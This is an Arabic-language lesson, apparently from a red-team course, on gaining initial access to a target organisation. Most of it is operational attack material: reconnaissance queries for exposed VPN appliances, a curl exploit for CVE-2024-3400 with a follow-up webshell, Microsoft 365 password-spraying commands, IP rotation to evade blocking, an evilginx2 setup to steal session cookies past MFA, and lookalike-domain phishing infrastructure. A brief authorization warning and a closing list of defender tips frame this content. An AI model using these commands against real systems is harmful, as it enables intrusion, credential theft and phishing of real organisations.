النفاذ الأولي — نقطة الارتكاز الأولى

هذه هي حزمة البيانات الأولى التي تطأ أرض الهدف. كل ما يتلو ذلك — من تصعيد للصلاحيات، وتحرك جانبي، وتسريب للبيانات — ما هو إلا تبعات لهذه الخطوة. تُظهر تقارير Mandiant (M-Trends) باستمرار هيمنة ثلاثة نواقل رئيسية: استغلال التطبيقات المتاحة للعموم، إساءة استخدام اعتمادات دخول صحيحة، والتصيّد المُوجّه. سنقوم بتنفيذ كل منها.

[!warning] ضمن النطاق المصرح به فقط لا تُنفذ هذه العمليات إلا على الأنظمة التي تملكها أو لديك إذن خطي صريح باختبارها. خلاف ذلك، تُعد هذه الأفعال انتهاكاً مباشراً للقوانين السيبرانية.

الناقل 1 — الخدمات المكشوفة (T1190)

الأسلوب الكلاسيكي: استغلال تطبيق أو جهاز عرضة للاختراق ومتاح مباشرة على الإنترنت. وبحسب قوائم CISA KEV، فإن أبرز الأنظمة المتضررة هي: شبكات الـ VPN، جدران الحماية الطرفية (Edge Firewalls)، أنظمة نقل الملفات، خوادم البريد، وأدوات التعاون المؤسسي.

تحديد الأهداف المكشوفة

# تحديد النطاق الخارجي للهدف
$ shodan search 'ssl:"target.gov" port:443'
$ shodan search 'org:"Target Org" "Fortinet"'
$ shodan search 'org:"Target Org" product:"Ivanti Connect Secure"'
$ fofa.info 'cert="target.gov" && (header="Citrix" || header="Pulse" || header="Fortinet")'
$ 
# البحث عن إصدارات محددة
$ shodan search 'http.html:"GlobalProtect Portal" version'
$ nuclei -u https://vpn.target.gov -t cves/2024/ -severity critical,high

مثال على الاستغلال — CVE-2024-3400 (PAN-OS GlobalProtect)

$ curl -k 'https://vpn.target.gov/ssl-vpn/hipreport.esp' \
$   -H "Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/css/\`id\`"
# بعد تحقيق تنفيذ الأوامر عن بُعد (RCE): يتم زرع قشرة ويب (Webshell) للانطلاق نحو الشبكة الداخلية

[!tip] أجهزة الحماية الطرفية هي "الكنز الاستراتيجي" يقبع الموجّه (Router) أو جدار الحماية في قلب حركة المرور بين المستخدمين والخوادم. اختراقه يمنحك رؤية كاملة للبيانات المتبادلة، والقدرة على اقتناص اعتمادات الدخول، وتوفير نقطة إعادة توجيه مستقرة؛ وهذا هو السبب في استثمار الدول بشكل مكثف في ثغرات "اليوم الصفر" (0-day) لهذه الأجهزة.

الناقل 2 — هجمات الهوية (T1078, T1110)

هذه الهجمات أقل تكلفة من ثغرات 0-day وأصعب في الكشف؛ إذ تسجل معظم الأنظمة المؤسسية دخول المهاجم كعملية "تسجيل دخول طبيعية".

رش كلمات المرور (Password Spraying) — M365 / Entra

# بناء قائمة مستخدمين بناءً على LinkedIn والتسريبات السابقة
# تجربة كلمة مرور واحدة شائعة على جميع المستخدمين لتجنب إغلاق الحسابات (Account Lockout)
$ msolspray --userlist users.txt --password 'Spring2026!'
$ 
# أو عبر طلب REST مباشر
$ curl 'https://login.microsoftonline.com/common/oauth2/token' \
$   -d 'grant_type=password&username=alice@target.gov&password=Spring2026!&client_id=...'

حشو الاعتمادات المسربة (Credential Stuffing)

# استخدام أدوات تدوير العناوين لتجنب الحظر
$ fireprox + ip-rotator → توزيع الطلبات عبر مناطق AWS الجغرافية لتفادي حظر عنوان الـ IP

تصيد الوسيط (Adversary-in-the-Middle) لتجاوز MFA

# evilginx2 — يعمل كوسيط لموقع Microsoft الحقيقي لاقتناص ملف تعريف ارتباط الجلسة (Session Cookie)
$ git clone https://github.com/kgretzky/evilginx2 && cd evilginx2 && go build
$ sudo ./evilginx2 -p ./phishlets
$ config domain login-target-365.com
$ phishlets enable o365
$ lures create o365 → إنشاء رابط لإرساله للضحية

[!danger] هجمات AitM تهزم المصادقة الثنائية التقليدية إذا قام المستخدم بالمصادقة عبر "بروكسي" المهاجم، فسيتمكن المهاجم من سرقة ملف تعريف ارتباط الجلسة بعد تجاوز المصادقة الثنائية (MFA) — مما يجعل رموز SMS أو التطبيقات غير ذات جدوى. الحل يكمن في استخدام MFA مقاوم للتصيد (مثل مفاتيح FIDO2 الصلبة) وربط الجلسة بالأجهزة الموثوقة فقط (Conditional Access).

الناقل 3 — التصيد المُوجّه (T1566)

لا يزال هذا الناقل هو الخيار الأول في الحملات السيبرانية التي تدعمها الدول. لا تعتمد فعاليته على حداثة الثغرة بقدر ما تعتمد على جودة الحبكة (Pretext).

صياغة الحبكة (Pretext)

قم بمطابقة الحبكة مع ملف الهدف الذي أعددته في درس "اختيار الأهداف":

البناء والإرسال

# استخدام نطاق يبدو حقيقياً (نطاقات متشابهة أو منتحلة)
$ proxychains certbot certonly --standalone -d login-target-365.com
$ 
# إعداد سجلات SPF/DKIM/DMARC لضمان وصول الرسالة لصندوق الوارد
$ dig +short TXT login-target-365.com  # إضافة v=spf1 ... -all
$ 
# الإرسال عبر gophish أو evilginx
$ gophish admin → إنشاء حملة → استيراد قائمة الأهداف → إطلاق

سلاسل الحمولات (Payloads) الفعالة في 2024–2026

• التهريب عبر HTML (HTML Smuggling): مرفق HTML يبني الملف الخبيث داخل ذاكرة المتصفح لتجاوز بوابات الحماية.
• ملفات الحاويات (ISO/IMG/VHD): عند فتح هذه الملفات، يتم تجاهل علامة "Web Mark" (MoTW)، مما يسمح للملفات بداخلها بالعمل دون تحذيرات SmartScreen.
• تطبيقات OneNote أو ملفات LNK: لا تزال تنجح في عبور فلاتر البريد في العديد من الشركات.
• تصيد منح الصلاحيات (OAuth Consent): لا حاجة لبرمجيات خبيثة؛ فقط اقنع المستخدم بمنح تطبيق Azure خبيث صلاحية

  Mail.Read

  .

الناقل 4 — سلسلة التوريد وعلاقات الثقة (T1195, T1199)

استهداف مورد صغير أو شريك تقني يمتلك بالفعل وصولاً شرعياً للهدف الكبير. سنخصص درساً كاملاً لهذا النوع.

الناقل 5 — الوسائط الفيزيائية (T1091, T1200)

تُستخدم ضد الشبكات المعزولة عن الإنترنت (Air-gapped). مثل ترك وحدة USB خبيثة في مؤتمر، أو وضع كابل شحن ملغم في فندق.

قائمة مراجعة المشغل (Operator Checklist) قبل التنفيذ

نصائح للمدافعين (Defenders)

• الهوية هي خط الدفاع الأول: استثمر في المصادقة المقاومة للتصيد ومراجعة صلاحيات تطبيقات OAuth.
• التحديث الدوري للأجهزة الطرفية: أي ثغرة في قائمة CISA KEV تخص أجهزة الـ VPN يجب ترقيعها فوراً.
• مراقبة النطاقات المتشابهة: تفعيل الحماية ضد انتحال النطاقات (DMARC Enforcement).
• تحليل المرفقات في بيئة معزولة (Sandboxing): كشف تقنيات التهريب عبر HTML وملفات الحاويات.
• تمكين المستخدمين: توفير زر "الإبلاغ عن تصيد" بنقرة واحدة يقلل من وقت بقاء المهاجم داخل الشبكة بشكل كبير.